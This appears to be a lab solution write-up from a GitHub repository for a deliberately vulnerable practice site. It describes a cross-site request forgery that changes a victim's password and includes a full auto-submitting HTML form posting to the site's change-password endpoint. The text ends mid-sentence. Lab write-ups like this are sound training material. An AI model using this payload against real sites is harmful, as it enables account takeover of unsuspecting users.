hack-yourself-first-solutions/#18 Change password using CSRF at main · htmlhack/hack-yourself-first-solutions · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
#18 Change password using CSRF

Summary: CSRF (Cross-Site Request Forgery) makes an attacker to change password of the victim
Steps to reproduce: Go to change password, enter any random text and capture the request in burp. Then right click on the request, click on engagement tools, and Generate CSRF PoC. In options, enable Include auto-submit script, and click Regenerate and copy the code and drop the request. Now, create a HTML file in your system and paste the copied CSRF PoC and save and run the file. Now you can see that your password is changed.
Impact: An attacker can reset password of the victim and that leads to full account takeover.

If you do not have Burpsuite pro, then here is the CSRF PoC:


<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://hack-yourself-first.com/Account/ChangePassword" method="POST">
      <input type="hidden" name="NewPassword" value="$newpassword" />
      <input type="hidden" name="ConfirmPassword" value="$newpassword" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

update $newpassword to which you want to change as